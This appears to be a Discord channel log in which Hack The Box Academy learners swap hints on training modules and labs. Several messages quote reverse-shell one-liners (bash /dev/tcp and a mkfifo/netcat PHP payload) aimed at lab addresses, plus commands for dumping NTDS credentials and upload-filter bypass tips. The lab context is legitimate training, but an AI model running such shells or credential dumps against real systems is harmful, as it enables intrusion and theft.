#modules

1 messages · Page 400 of 1

neon wadi
#

Some of those password attacks took a very long time.

tired atlas
#

Thank lord cuz its 7am haven't slept all night

#

Happier days will come. I've overcome the password attacks module, for a while it's cruise before the AD module

slender thunder
#

Does anybody need an extra in their group for CTF events etc. (B.S in Cybersecurity, Security+, & currently focusing on more Linux/Python and CYSA+) clearly focused more on the defensive side but want to work more on the offensive side 🧐

thick steppe
#

Guys I found this in Task scheduling section of the LInux fundamentals module, is this a mistake from HTB or I am looking it the wrong way

Cleanup DB

0 0 * * 0 /path/to/scripts/clean_database.sh
The third task, Cleanup DB, is to be executed every Sunday at midnight. This is specified by the entries 0 and 0 in the minute and hour columns and 0 in the days-of-the-week column. The task is executed by the clean_database.sh script, whose path is given in the last column.

Backups

0 0 * * 7 /path/to/scripts/backup.sh
The fourth task, backups, is to be executed every Sunday at midnight. This is indicated by the entries 0 and 0 in the minute and hour columns and 7 in the days-of-the-week column. The task is executed by the backup.sh script, whose path is given in the last column.

is Sunday is 0 in first one then why is it 7 in second one

ocean night
#

Sunday is 0 or 7

#

Perhaps it's stated like that to make you look in to the documentation and understand that fact

lean pecan
#

Hello everyone, anyone completed Dog HTB Machine

ocean night
lean pecan
verbal stump
ocean night
verbal stump
ocean night
#

Ask your question here

#

OR in the relevant channel

#

Note, that you will not always get an answer, or nudge

analog dock
#

<@&861185840277487616>

shut ice
#

Can anyone give a hint on the last question for AD Trust Attacks SA?

burnt hill
#

Hello!! I am working on the Windows File Transfer Methods module "https://academy.hackthebox.com/module/24/section/160", and doing some tests I am having different "errors", when using PowerShell DownloadString I am getting blocked by the antivirus, that is fair enought, but when using Invoke-WebRequest is telling me that the remote host could not be resolved, can anyone tell me why? I just copied the instruction and I also tried a different github url, but same result

north owl
#

Hey everyone, I'd like some help with the getting started module, specifically the public exploits section. So, the basis for the lab is to use web enumeration and metasploit to capture the flag on the target. Here has been my process thus far:

  • run: nmap -sV [target ip]
  • when I did this the first time, it returned that nginx was running on an open port. Seeing how nginx has several vulnerabilities I figured that was the key and loaded it into metasploit
  • metasploit couldn't launch the exploit saying that the service was unresponsive
  • I went back to nmap and ran the command again and now the only services found are rcpbind and openssh, neither of which seem to have viable exploits
  • I tried resetting the instance and the target, but nginx never shows up again.

Is this a bug? Or, is rcpbind or openssh the true path to solving this?

cloud urchin
shut ice
#

I would reset the box if the scan is showing different results from before

#

Also try browsing to it as well as nmap scan

cloud urchin
#

There is no need to nmap scan. There is only one port running a web service, if you navigate to the page it should be very obvious what you should search an exploit for.

cloud urchin
#

The only caveat you may need to know is use http:// instead of https://

gloomy coral
#

Hey everyone! 👋

I’m new to cybersecurity and just beginning my journey. I transitioned from the medical field after 12 years because I wasn’t happy in my career. After taking a career assessment, I scored high for a career in IT, which really motivated me to make the switch!

I have some prior experience with tech—I took an elective in Python programming back in college, and I’ve also completed IT and Network Fundamentals courses. Last week, I officially decided to pursue cybersecurity, and I’ll be starting my Bachelor’s in IT in April 2025!

Right now, I’m diving into HTB Academy, but I’m not sure where to start. Should I begin with the Skill Path or the Job Role Path first? Any advice from those who’ve been through it would be greatly appreciated!

Looking forward to learning with you all! 🚀

cloud urchin
#

If you know linux/windows fundamentals I'd start on the job role path.

compact patrolBOT
gloomy coral
#

Thanks

shrewd zealot
#

hey i was trying to setup my own environment with htb, and i have everything installed correctly i think, but when i try to link my htb account, i get this error message. if anyone can help it would be greatly appreciated. thanks

ocean night
#

Uhh, that's not how you link an account

#

You're trying to initiate a conda environment, but are prefixing the command with CyberApocalypse@htb[/htb]$

#

Did you paste the right screenshot?

shrewd zealot
ocean night
#

Oh, sorry I've not worked on that module

#

Hopefully someone can advise / nudge

shrewd zealot
#

and then when i go down to the init section, is kind of where i'm lost at

ocean night
#

..but yeah, you are pasting more than you need to

#

The command you want to run is just like "conda init"

shrewd zealot
#

well it's the beginning of the module where it's telling me how to setup my own environment

ocean night
#

without what looks like a bash prompt before it

shrewd zealot
#

how do i set it up to where i have my htb account instead of my C:>?

ocean night
#

That's just bash profile customisation

#

It's not linking your account

shrewd zealot
#

ohhh\

ocean night
#

It's just an example of how the bash shell would look under the Pwnbox

#

Anyway, not done that module, so others may be of more help 🙂

shrewd zealot
#

thanks for the help! \

quiet trout
#

you may not be able to get it to do EXACTLY that but if you're interesting in customizing your prompt string, look into powershell and/or linux promptstring ($PS1 i think is the env var in linux) customizations. if you use kali, look into p10k theme for zsh it has a wizard for customizing PS1

unique spruce
#

yo i didnt know where to ask because i dont have access to general but where can i find my account identifier

waxen rose
#

Yes it so great to here let to it

quiet trout
#

@unique spruce ^

unique spruce
#

i did that

#

i linked my thing

quiet trout
#

pretty sure it should kick over

unique spruce
#

still hasnt

quiet trout
#

ok so you linked it but you cant leave #module to go to #general or anything?

unique spruce
#

thans

waxen totem
#

Very big on the right hand side

quiet trout
#

log out of htb and quit discord, restart log back in first, then launch discord

unique spruce
#

i was on the little thing inbetween labs and academy

quiet trout
#

thats weird, why isnt that piece in the security settings where the discord link is?

#

or at least a link to in that security settings section that takes you to the link you posted

waxen totem
quiet trout
#

oic

thin parrot
#

Cant post in erratum for some reason but there is a typo in Info gathering - web edition | Subdomain Bruteforcing where the bash code for dnsenum uses a different wordlist than the one being referred to prior and afterward... harmless but bugs me for some reason lol

thin parrot
#

I typed up a whole thing but everytime I try to post it just returns "Error"

waxen totem
thin parrot
languid falcon
#

Hey guys, I’m pissed cus I’m so close to finishing the CBBH path, but stuck on the last section for Hacking Wordpress skills assessments. Any tips on just the final question?

waxen totem
languid falcon
lost kiln
#

Hey I'm working on the Skills Assessment for Intro to Assembly Language, Task 1. I have what I believe are the 14 pieces of the encoded shellcode, and have concatenated them in every way that I can think of. Would someone with experience in Assembly DM me please?? That would be awesome

vague yoke
#

I have been able to get the source code for upload.php and identify the upload directory via svg.

#

being that I cant do anything else. I tried to read /flag.txt and /flag without success.... also unable to upload webshell to the uploads directory.

fathom pendant
vague yoke
fathom pendant
#

you said you leaked the uploads.php; take a close look at what it does with the filename

#

if it helps run the code locally with php -r and replace the reference to the filename with a test name

#

@vague yoke my dms aren't open for module help; it should be fairly obvious, it's near the top of the file

verbal turtle
#

i am in Stack-Based Buffer Overflows on Linux x86 module

#

i have problem with the address

#

i dont know why 0xc2 is in my buffer

lusty thicket
#

you code is throwing away results

languid falcon
# verbal turtle hello

Not to distract the question. But is this module good so far? I want to try it after CBBH

lost kiln
#

I don't want to spoil by listing out the values here, but assuming they are correct, I think my problem is with the concatenation, which I have been running with the python script "loader.py" from the module, which executes shellcode directly from hex.

verbal turtle
#

after this a want go to pwn.collage

languid falcon
severe inlet
#

Any hints please?

fathom pendant
#

@lost kiln intro to ASM is above tier 0 don't spoil code from the module

ocean night
#

If it's above Tier 0, just.. don't post any specifics, at all

#

@vague yoke 🙂

fathom pendant
#

all the tactics you need are covered by the module

vague yoke
#

I am stuck with this question ohGod

fathom pendant
#

¯_(ツ)_/¯

#

take it one step at a time; maybe double extensions might be a way forward

vague yoke
#

I tried that too, but I will give it another shot.

#

thanks

fathom pendant
#

to be clear: the results you get are -- only images allowed? or extension not allowed?

vague yoke
#

I got both depending on the test ....

fathom pendant
#

well --> only images allowed is a key to move forward

#

:) don't forget about magic bytes

vague yoke
#

tried that too, GIF8 🙂

fathom pendant
#

magic bytes must match extension + content-type

#

:P

severe inlet
#

During the skills assessment of SQLMap Essentials when i try to get information it comes blank why?

1:53:00] [INFO] retrieved:
[21:53:01] [CRITICAL] unable to retrieve the database names

severe inlet
vague yoke
#

I give up for today. will try again tomorrow.

rugged crag
cloud urchin
#

do you need some help?

opaque cosmos
#

help pls

cloud urchin
# opaque cosmos help pls

Ask your question by not postiong content from the module directly please, only tier 0 is allowed to be posted.

opaque cosmos
#

ohh

swift dove
#

I need help but i dont want to give out information regarding how to solve target in the Getting Started Module...

cloud urchin
swift dove
#

well, yesterday i was having issues running an nmap scan on a target, unless I specified the port it never gave me any results on other open ports. so i search for exploits on the port that i did get results from and i did find some but none of them ar in metasploits and thats the whole idea of the module section. Not sure if I have to still try to run the exploits i found tho not related to what was taught in the module section?

swift dove
cloud urchin
# swift dove Public Exploits

If you notice on the target that spawns, it provides a port. Whenever you see that on the HTB Academy platform, that means it's only that port you have to worry about. Don't bother with nmap, just visit that IP and port in your browser. You can click on the IP and paste it into your browser's address bar. It should be pretty straight forward as to which public exploit to find after that 😉

swift dove
fathom pendant
severe inlet
stuck fiber
#

Hello! I'm new here. Anyone available to help me out with the linux fundamentals?

languid loom
#

Hii, anyone interested in taking part in cyber apocalypse

waxen totem
stuck fiber
fathom pendant
#

~ is just the shorthand for the home directory

#

if you either pwd or echo $HOME you may find it more helpful, or running env to get a list of the environment variables

stuck fiber
#

thank you @fathom pendant, i'm not sure why it doesn't like those answers

fathom pendant
#

are you ssh to the target?

stuck fiber
#

i believe so

fathom pendant
#

pwnbox != target

#

spawn instance spawns pwnbox
spawn target spawns target

#

if your username is htb-ac-<numbers> then you're on the pwnbox, not ssh to the target

stuck fiber
#

i ran out of time. i'm stressed out lol maybe i'll figure it out tomorrow. Thank you

swift dove
#

ok so I found the exploit...but its not working...could it have been patched? (thats one of the suggestions i find online)

uneven lichen
#

I'm stuck on DACL Attacks II Skills Assessment, 2nd flag. Hint is: Create and Link. I have access to the creator account. There are two linkers, but there are no ACL entries where any users I own have privileges over the linkers. I'm not sure how to move forward from here.

fathom pendant
#

they get patched for unintendeds if it massively bypasses the learning aspect

#

but the labs are usually well written

fathom pendant
#

it's a simple file read exploit; no RCE

swift dove
fathom pendant
#

?

#

did you search the plugin that's given on the webpage you're given?

#

or did you assume the target was gonna be SMB like the examples and are shooting yourself in the foot

swift dove
#

I searched the Plugin I changed my target IP, the port and the file path to the flag and ran the exploit but it only scanned

fathom pendant
#

did the output tell you it saved a file?

#

:P

swift dove
#

no hehe

fathom pendant
#

normally not open to dms but i wanna see where you fucked up

#

if anything try resetting the target and trying again

young ore
fathom pendant
young ore
#

Both works

fathom pendant
#

yeah but who knows if they'll keep show as part of the syntax

swift dove
#

but actions is empty

fathom pendant
#

<actions> isn't valid :)

swift dove
#

show actions*

fathom pendant
#

dm me bc i wanna see what your options look like

fathom pendant
swift dove
eager ledge
#

Hi,

Module: Windows Privilege Escalation
Section: DnsAdmins
Section Link: https://academy.hackthebox.com/module/67/section/603

I managed to add netadm user to the Domain Admins group, which is shown when I run the net group command. But when I run the command whoami /groups , Domain Admins is not seen. Anyways, I tried to access the flag. But I am not allowed. Why?

autumn pilot
#

Think of a way to refresh the current access token assigned to the user so it updates the privileges

#

it is something simple

halcyon tinsel
#

what does this question expect?? nothing i enter seems to work (ping if you reply pls)

west rampart
halcyon tinsel
#

yh i tried that

#

6.11+parrot-amd64
is what uname -r gives me

#

/proc/version gives 6.11.5-1parrot1 @west rampart

brazen saffron
#

You have the answer imo.

halcyon tinsel
brazen saffron
#

What did you try?

halcyon tinsel
#

ive tried most combinations

#

6.11.5, 6.11.0, 6.11

brazen saffron
#

Well what's your module?

halcyon tinsel
#

linux fundamentakls

#

just lf a quick comp but this question stumped me

autumn pilot
#

make sure you've connected to the target machine

spiral sapphire
#

Hey! I found a typo in Web Fuzzing module "Tooling" section. Should be "an" not "a". Someone can fix it?

brazen saffron
halcyon tinsel
#

im under system information rn, didnt recieve a target ip

brazen saffron
autumn pilot
#

you need to spawn the target machine

#

those types of nuances are explained in the Intro to Academy module

halcyon tinsel
#

ah can yo driect me to he section for target ip

#

oml my keyboard

halcyon tinsel
spiral sapphire
neat crest
#

idk why but reverse shell on Nibbles just aint working

#

I tried different technique

#

copied from youtubers and such

#

uploaded a php file, testing it out with just the id command, now I have nc -nvlp 4444 setup ready but when I use /bin/bash -i >& /dev/tcp/10.10.14.188/4444 0>&1 it doesnt work, I even tried replacing the "&" to %26, I tried other php reverse shells. What am I doing wrong?

waxen totem
#

e.g

<?php system("<COMMAND HERE>")?>
neat crest
#

yes I'm using : <?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.1888 4444>/tmp/f"); ?>

round relic
#

Anyone able to lend a hand with pivoting tunnelling and port forwarding module. Specifically web server pivoting with rpivot I'm not sure if it's buggy or I'm doing something wrong

dry falcon
round relic
dry falcon
#

still not connecting sadglas

desert quail
#

Hey guys, hope yall are having a good day

Can someone please give me a clue or any help possible. I can't seem to get the answear right

https://academy.hackthebox.com/module/226/section/2416

Working with IDS/IPS -> Snort Rule Development -> keyword that should be specified right before the content keyword

Apreciate any help

neat crest
#

can anyone check upon Nibbles, even on metasploit I can't even get a shell

waxen totem
neat crest
#

ye typo in discord, is 188 in kali

waxen totem
#

what about using the normal bash revshell payload?

#

Here's the specific one I used

<?php system("bash -c 'bash -i >& /dev/tcp/10.10.14.87/9001 0>&1'")?>
sudden gyro
#

What if I’m a crip

waxen totem
waxen totem
waxen totem
desert quail
eager ledge
grizzled schooner
#

Yeah I just tried again, and the creds I have don't work for ssh lol

fathom tide
#

what am i doing wrong here?

safe star
fathom tide
fickle crystal
safe star
leaden island
#

yo guys i need

#

help of course

#

im stuck on the last question in DNS in footpriting module

#

since like 3 hours

#

the question says: What is the FQDN of the host where the last octet ends with "x.x.x.203"?

#

what i did so far:

#

i did a zone transfer on inlanefreight.htb and it showed some domains

#

i enumerated them all by DNS brute force, since none of them accepted zone transfer except for internal.inlanefreight.htb

#

only dev.inlanefreight.htb showed some sub domains, but enumerating them further showed none

#

i dont know what to do next

halcyon tinsel
#

I'm trying to learn with HTB Modules and keep getting the problem of pwnbox spawns. Can I set up HTB modified Parrot? I can't pay for premium and need a solution for answering module questions, as they help me to learn best :D

neat crest
leaden island
halcyon tinsel
#

question: figure out what the group id of "alex" is

#

its going to range across systems and i need those question cause they help me learn best. Currently I have kali purple for small projects.

#

@leaden island ^^ :D

fathom tide
upbeat linden
#

Hi, I have a question.

I'm currently working on the Attacking FTP section in the Attacking Common Services module, but I can't seem to find any FTP service running on the target machine.

I already performed a full port scan, and these are the only open ports I can see:

└─$ sudo nmap -sS -Pn -n 10.129.186.83 --min-rate 4000 --max-retries 2 -p- 
[sudo] password for kali: 
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-18 08:36 EDT
Stats: 0:00:07 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 41.31% done; ETC: 08:36 (0:00:10 remaining)
Nmap scan report for 10.129.186.83
Host is up (0.28s latency).
Not shown: 65531 closed tcp ports (reset)
PORT    STATE SERVICE
22/tcp  open  ssh
53/tcp  open  domain
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Nmap done: 1 IP address (1 host up) scanned in 17.22 seconds

Do I need to exploit SMB to answer the question:
"What port is the FTP service running on?"
Or is something wrong with my current setup?

Any advice would be really appreciated. Thanks!

#
└─$ sudo nmap -sS -Pn -n 10.129.186.83 --min-rate 500 --max-retries 2 -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-18 08:35 EDT
Warning: 10.129.186.83 giving up on port because retransmission cap hit (2).
Stats: 0:01:37 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 68.01% done; ETC: 08:38 (0:00:46 remaining)
Nmap scan report for 10.129.186.83
Host is up (0.28s latency).
Not shown: 63373 closed tcp ports (reset), 2158 filtered tcp ports (no-response)
PORT    STATE SERVICE
22/tcp  open  ssh
53/tcp  open  domain
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Nmap done: 1 IP address (1 host up) scanned in 147.52 seconds
fathom tide
#

Maybe try -sT with mentioning ports 21, 20 and then check

abstract iron
#

Windows Priv Esc / Windows Built-in Groups (SeBackup)

I got a question, here we learned about copying the registry hives and dump ntds.dit file right. i found quick win using crackmapexec like so:

nxc smb <ip-here> -u username -p password123 --ntds # for ntds.dit dump remotely

or --sam for registry gives

why don't they work in this specific section's machine?

  • if i remember correctly the quick win was given in Windows Local Password Attacks in passwords attack module.

thanks

upbeat linden
#
└─$ sudo nmap -sT 10.129.186.83 -p 21,20                                 
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-18 08:48 EDT
Nmap scan report for 10.129.186.83
Host is up (0.28s latency).

PORT   STATE  SERVICE
20/tcp closed ftp-data
21/tcp closed ftp

Nmap done: 1 IP address (1 host up) scanned in 0.67 seconds

I still can't see it.

fathom tide
#

Cause it's actually closed

burnt hill
#

Hi I am mounting a linux folder using xfreerdp "xfreerdp /v:10.10.10.132 /d:HTB /u:administrator /p:'Password0@' /drive:linux,/home/plaintext/htb/academy/filetransfer", but I can't create or move files or folders on Windows while connecting remotely with xfreerdp, I don't have permissions, how can I solve this?

cerulean herald
#

FTP might not be 21/20 if configured

fathom tide
#

Yea try -sT with all ports

upbeat linden
# cerulean herald scan for all the ports
└─$ sudo nmap -sT 10.129.186.83 -p- --min-rate 500 --max-retries 2 -Pn -n                                                                                                                  
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-18 08:54 EDT
Warning: 10.129.186.83 giving up on port because retransmission cap hit (2).
Stats: 0:00:04 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 2.93% done; ETC: 08:56 (0:02:13 remaining)
Nmap scan report for 10.129.186.83
Host is up (0.28s latency).
Not shown: 63602 closed tcp ports (conn-refused), 1929 filtered tcp ports (no-response)
PORT    STATE SERVICE
22/tcp  open  ssh
53/tcp  open  domain
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Nmap done: 1 IP address (1 host up) scanned in 165.88 seconds

I still can not see it...

flint palm
#

Windows Privilege Escalation Windows Server command is not executable in server didn't find vulnarabilities to exploit via msfconsole can someone assist?

cerulean herald
#

try doing this

upbeat linden
# cerulean herald try doing this
└─$ sudo nmap -sV --script ftp-* -p 21,20,2121,990 10.129.186.83
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-18 09:05 EDT
Nmap scan report for 10.129.186.83
Host is up (0.34s latency).

PORT     STATE  SERVICE     VERSION
20/tcp   closed ftp-data
21/tcp   closed ftp
990/tcp  closed ftps
2121/tcp closed ccproxy-ftp

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.00 seconds
#

Do I need to exploit SMB to answer the question:
"What port is the FTP service running on?"

cerulean herald
#

try reseting the machine

halcyon tinsel
#

I'm trying to learn with HTB Modules and keep getting the problem of pwnbox spawns. Can I set up HTB modified Parrot? I can't pay for premium and need a solution for answering module questions, as they help me to learn best. Ex: figure out what the group id of "alex" is. It's going to range across systems and i need those questions cause they help me learn best. Currently I have Kali Purple for small projects.

upbeat linden
cerulean herald
#

let me check it out

upbeat linden
flint palm
slender crystal
#

how am i supposed to ask a question when it keeps saying i can't ask the question?

halcyon tinsel
#

got any solutions

flint palm
#

I have kali on vm and I am downloading vpn connection file and executing it with command openvpn Downloads/academy-regular.ovpn

#

and it connects me to htb

slender crystal
#

Constantly says:

This can't be posted because it contains content blocked by this server. This may also be viewed by server owners
halcyon tinsel
cerulean herald
#

nmap -sC -sV -p- 10.129.186.83 Try this @upbeat linden

flint palm
#

yes search in it module there is a connection file down after the explanation section finishes

cerulean herald
#

and i read you might need to reset the machine many times for the service to be up

flint palm
#

scroll down and you will see it

halcyon tinsel
#

so thatll connect me to a kali machine or..?

#

if so it means no more boot problems so yay

flint palm
#

it will connect you to htb server and you can solve htb questions directly on your machine

#

you will in the upper right corner of you kali the connection mark it will be typically be something like 10.10.15.51

#

lock and cable mark

halcyon tinsel
#

lock and cable?

flint palm
#

i roughly described how it will look

slender crystal
#

Im currently doing some powershell stuff and im going insane. Im ssh'd into the VM and I can interact with the machine, however I can't install any PS modules, because the machine cannot connect to the internet. When I try and test the connection using a builtin powershell cmdlet using a well known domain, it errors out and says it cant resolve the domain. It also can't install anything from the powershell gallery which is the reason im running into this issue.
Anyone had a similar issue before or know whats wrong or have any suggestions please let me know.

halcyon tinsel
#

ok ill grab that connection file

flint palm
#

yes and execute it with command openvpn Downloads/academy-regular.ovpn

#

typically it is downloaded into downloads

#

but check the folder where the file is

halcyon tinsel
#

yh i understand

flint palm
#

sometimes it can be in different place

halcyon tinsel
#

i dont rlly use openvpn much,

cerulean herald
flint palm
#

you will have to

halcyon tinsel
flint palm
#

no

#

the access will be unlimited but you know target is limited usually

slender crystal
halcyon tinsel
#

ill pay for that stuff if need be later or use another service

flint palm
#

the pwnbox is limited kali will be unlimited but target will be limited

#

something like that

upbeat linden
cerulean herald
#

these are some comments i found that might help you

halcyon tinsel
#

@cerulean herald ur profile made me laugh man, i love it

neat crest
#

I don't understand TARGETURI, "The base path to the cms", what does Metasploit mean by that?

cerulean herald
#

thankss

upbeat linden
#

thank you so much

halcyon tinsel
#

is it slow? if so i feel you

neat crest
#

for module/77/section/859, found it runs on GetSimple CMS 3.3.15, but when I run this, it says "target si not vulnerable"

halcyon tinsel
#

@flint palm what page gives me the vpn. i cant find it for the life of me

fathom tide
halcyon tinsel
#

nvm found it i think

halcyon tinsel
fathom tide
#

I use sudo -b then it runs in background

halcyon tinsel
fathom tide
#

Each time you switch the country you will need to generate a new file

halcyon tinsel
#

also tcp or udp

fathom tide
#

Udp

fathom tide
#

Yea choose the country closest to you

halcyon tinsel
fathom tide
#

Yea i forgot it's not tryhackme

halcyon tinsel
#

ah

#

yh im not rdy for tryhackme yet

#

well for fun only not for learning

upbeat linden
#

Does the country I’m living in affect the lab environment by any chance?

upbeat linden
halcyon tinsel
#

slower

fathom tide
#

They just have specific countries nothing much

halcyon tinsel
#

same as a reg vpn

dark hedge
#

latency

upbeat linden
halcyon tinsel
#

AS soon

#

hopefully

fathom tide
#

I guess you choose the recommended one then should have the lowest ping

halcyon tinsel
#

i did that, eu recommended

#

can you get me the openvpn cmd rq?

fathom tide
#

Your on Windows?

halcyon tinsel
#

kali

fathom tide
#

Then change directory to downloads on the termine

#

Or cd Downloads

halcyon tinsel
#

i alr did that

compact halo
#

Does anyone know if you get a certificate (not certification) of completiong for completing the Pentester Path? I want to get some CEUs

halcyon tinsel
#

academy-regulr.ovpn

fathom tide
#

Then sudo -b openvpn whatever is the name of the file

halcyon tinsel
#

do i have to run on each boot?

fathom tide
#

Yes

#

My vm is always active on my laptop I rarely boot

dark hedge
halcyon tinsel
#

pain, can i set it to boot on startup

#

im just using a seperate machine for it

fathom tide
#

you can with cronjobs I haven't tried it though

compact halo
dark hedge
#

you can get a copy of your transcript. i think that shows the modules you've completed and how long each one takes

#

should be in the HTB Academy account settings

compact halo
halcyon tinsel
#

will this work for me?? chatgpt gave me it
sudo systemctl enable openvpn-client@academy-reular
sudo systemctl start openvpn-client@academy-reular

#

ignore spelling mistake

lusty thicket
halcyon tinsel
#

whats the problem w it

#

oh nvm

#

it doesnt realise i need to open it with openvpn

dark hedge
halcyon tinsel
#

wait am i high

halcyon tinsel
dark hedge
#

connecting to VPN is as simple as sudo openvpn /path/to/file.ovpn, i think it's better to just have it running in the background or in another virtual desktop

dark hedge
halcyon tinsel
#

im rrnning this with htb vpn, i dont have any faster options 😭

dark hedge
#

you may also want to try out some of the machines on the main platform which requires another VPN file

#

that's why i say you're better off manually running the command and having it run in the background until you're done with Academy for the day

halcyon tinsel
dark hedge
#

in order to interact with HTB's labs, you need to VPN into their network

halcyon tinsel
#

yep i got that

dark hedge
#

you do that using VPN software (OpenVPN) and a VPN file provided by HTB (.ovpn)

halcyon tinsel
#

yep

dark hedge
#

Academy and Labs use different VPN files

#

and you cannot connect to both at the same time

halcyon tinsel
#

oh i see, i have only been using acaademy

#

what can i get out of labs?

dark hedge
#

using what you've learned in Academy to test vulnerable machines

#

Academy is guided learning, Labs is by yourself

#

at least for the active content you're by yourself

halcyon tinsel
#

ohhh, as of now i will not be using labs. I've been using tryhackme and other services

#

or i had intended to, however im still working on fundamentals of linux

dark hedge
#

that's fine

halcyon tinsel
#

wb man

flint palm
#

Guys when I created msfvenom file for making reverse shell with windows using metasploit I set the port for 445 which is opened but when I used multi/handler it is trying to connect 4444 which is closed on that machine what to do?

halcyon tinsel
#

;-;

flint palm
#

to open port you must have administrators right and I am not an administrator there!

flint palm
#

very limited privileges on the machine no possibility to become an administrator))

leaden hound
#

hello everyone, where do I begin with htb?

compact patrolBOT
rain saffron
#

I'm doing the brute forcing module and it's asking me to install cupp, but i get this error on Kali, any advice?

desert quail
#

and dont forget to make it executable with chmod +x cupp.py

rain saffron
#

ty! 😄

unique spruce
#

hello im on the cpts path and im on the footprinting module dns and i keep getting nxdomain when i try to find the fqdn and i cant find the address ending in 203

#

would rly appreciate the help

west arrow
#

I can't seem to connect to the windows server to test file permissions.
Module link: https://academy.hackthebox.com/module/49/section/1017
Section: Using smbclient to list available shares

I type this in > smbclient -L SERVER_IP -U htb-student replacing the server_ip with the ip used to access the windows through rdp. And i get > Connection to 10.129.62.123 failed (Error NT_STATUS_IO_TIMEOUT)

round relic
#

Try with this format ////TargetIp//

#

You can also specify the share your trying to access after "//" If anonymous log in is supported try the -N flag. Smbmap is better for file permissions

pale hull
#

Hello everyone, wondering if I could discuss with someone the NMAP Hard-LAB. Just want to make sure I'm on the right track

#

like all I wanted to know is they are asking for one service or all the services

west arrow
#

Also tried smbmap: smbmap -H 10.129.62.123 -u htb-student -p Academy_WinFun!

#

But doesn't detect hosts serving SMB

subtle badge
#

anyone have a good youtube video guide for "network enumeration with nmap" module?

round relic
pale hull
#

nvm figured it out

abstract iron
dim shale
#

Hi everyone, anyone interested in helping me with the File Inclusion assessment? something does very wrong with the webshell injection and I can't for the life of me figure out what I'm doing wrong 🤦‍♀️

west arrow
round relic
#

Make sure you include the port number that the smbclient is running on I'm pretty sure I had similar issues with this

unique spruce
#

Bro im doing dnd

#

Dns*

round relic
#

Hit by accident mate I'll look in my notes see if I have anything for you

round relic
west arrow
verbal stump
round relic
west arrow
#

NTFS vs. Share Permissions in the Windows Fundamentals

#

@round relic wait I might have found a solution on the htb forum

#

I had to turn off Windows firewall defender

#

Thank you for your help anyway @round relic prayge

ashen light
#

Hi everyone,
Currently I'm working on Firewall and IDS/IPS Evasion - Hard Lab section from the "Network enumeration with Nmap" module. I found the service, but after trying several firewall and IDS/IPS evasion techniques, I can't get the service version back (I performed a Ack Scan, I disabled ICMP Echo Request, DNS Resolution and ARP ping, I scan the target by using another IP address and from port 53 and I changed timing)
Can someone help me ?

round relic
round relic
west arrow
round relic
ashen light
mortal anvil
#

Hey 👋 I am new here, just getting into hack the box and learning about cyber security, trying to get into bug bounties and penetration testing.

tepid shard
#

@ashen light hi, nmap uses different scripts to bypass firewalls and IDS/IPS. you can find the official document here. https://nmap.org/nsedoc/

young ore
ashen light
young ore
#

Try with sudo

round relic
scarlet garnet
#

Hi everyone, I have problem with Cors misconfiguration, in Advanced XSS and csrf exploitation

#

will anyone help me please

ashen light
supple dragon
round relic
ashen light
round relic
#

Nope diffrent versions I think try with ncat

round relic
autumn pilot
#

The hint provides the expected format for the answer

mossy marten
#

mybad just realized

heady belfry
#

in the windows fundamentals module, Operating System Structure, how do I get the actual GUI windows screen? Every time I try and spawn the windows target machine, it says LOGON FAILURE

vague yoke
#

Is anyone available to give me a hand in private with https://academy.hackthebox.com/module/136/section/1310 ? Skills Assessment - File Upload Attacks. I have spent several hours, done several things and I am still stuck. I can go through what I have done in details. I was able to get some aspects of my attack to work fine, but I can't reach the end goal. I would really apreciate if anyone can assist me with this as I am getting really frustrated and feel that either I am really close and missing something small or there is a problem in the lab. I worked on this question yesterday and today

#

anyone?

pale hull
vague yoke
#

wordlists for what? for the extensions?

pale hull
#

oh sorry that is for the dns

signal hound
#

Hi im doing active directory enumeration & attacks > credentialed enumeration - from linux
When i try to run bloodhound i get an Error:"the futex facility returned an unexpected error code. Aborted"
What should i do?
EDIT: NEEDED TO RDP TO THE HOST

nimble scroll
#

hi

#

is there anyone to help me with this ?

#

Exploit a SSRF vulnerability to identify an internal web application. Access the internal application to obtain the flag. , Server-side Attacks
Page 3
Identifying SSRF
Identifying SSRF

#

I managed to find the ports and still have issues to access the machine to get the flag, the lesson doesn t give enough info

safe star
nimble scroll
#

by using ffuz

#

but that doesn t help me that much how to undertand to get the access or the flag

safe star
nimble scroll
#

To determine whether the HTTP response reflects the SSRF response to us, let us point the web application to itself by providing the URL http://127.0.0.1/index.php: this thing I don t undertand

#

I use burpsuite

safe star
#

But that’s not what they’re looking for

nimble scroll
#

I did to find the ports , but I don t know what should I do next

safe star
#

Just curl it

#

It’s basically the same command with ffuf

nimble scroll
#

what should I curl ?

safe star
#

Just like how you fuzzed it

nimble scroll
#

I don t understand, you mean about ports?

safe star
#

Or capture the request burpsuite and change the port

nimble scroll
#

I don t know how I should write the curl command

#

I tried this and got only this , ffuf -w ports.txt -u http://ip target:FUZZ -s -mc all
80

#

still didn t got enough info for the next step to understand how to get the access/flag

#

is there anyone who could help me with some more info ? :/ The lesson doesn t help me to get what should I do and I can t get further to understand what I do wrong

proud pine
#

We can't offer assistance for such CTFs.

nimble scroll
#

there is no one to help me ? :/ I tried also with chatgpt and no luck....

safe star
#

It’s just like the lesson

nimble scroll
#

yes

#

and when I access it gives me an error that I cannot access

#

I also tried to curl all of them but nothing

safe star
#

Dm the command

uneven lichen
#

Did you ever get passed the Skills Assessment? I'm currently stuck on Q2. I am able to edit the script and know who the GPO creators/linkers are. I don't know how to get to the GPO linker accounts.

nimble scroll
#

Still got the issue to get the next step :/

dim crater
#

Hi, i'm at the password attacks module, performing Pass the Ticket from Linux, im a bit confused on the chisel+proxychains thing so I need to know if what i understood is valid:
